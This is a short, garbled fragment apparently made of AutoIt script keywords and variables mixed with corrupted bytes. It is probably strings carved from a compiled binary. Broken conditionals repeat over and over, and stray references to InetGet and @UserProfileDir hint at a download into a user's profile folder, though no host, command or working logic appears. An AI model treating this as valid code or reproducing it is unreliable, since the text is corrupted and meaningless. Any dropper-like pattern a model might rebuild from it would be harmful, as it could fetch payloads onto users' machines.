$(Dirÿ)ifÛ5then
$cf
elseif(Pn
ela
$_)ifÛ1theN
$af
Else$f$a-_SifÛ0then
$af
Else$f$a-_SifÛ0then
$af

elseif$Pn
_)ifÛ5then
$af

elseif(InetGettheN
$afûEeif$P)ifÛ5theN
$af
Else$_f$0
$Û5t¢hen
$af
elseif(Pn
ela
$_)ifÛ1theN
$af
Else$f$a-_)ifÛ0then
$af

elseif$f
EB$R$B$R$B$R$4$r$1$w$r$B$b$c(,,)
EndFuncPn
_)ifÛ5then
$af

elseif(Pn
$_)ifÛ5theN
$af
ElseifaÿÿifÛ6then$af

elseif$P2R_)ifÛ5theN
$af2=$P+$5+
Elseif$aÿÿÿ*)ifÛthen
$af

elseif(Pn
$_)

elseif(Pn
$af
ElseifaÿÿifÛ6then$af

elseif$P2R_)ifÛ5thuN
$af2=$P+$5+
Elseif$aÿÿÿ*)ifÛ0th$af
Elseifa$l$d$r$0$J$B$d$f
Else$_)ifÛ5@UserProfileDirÿ)ifÛ5th)n
$cf
elseif(PnfÛ6then
$aft
Elsei$@L×_)ifÛ4then
$af

elseif(Pnÿÿÿÿÿÿÿÿÿ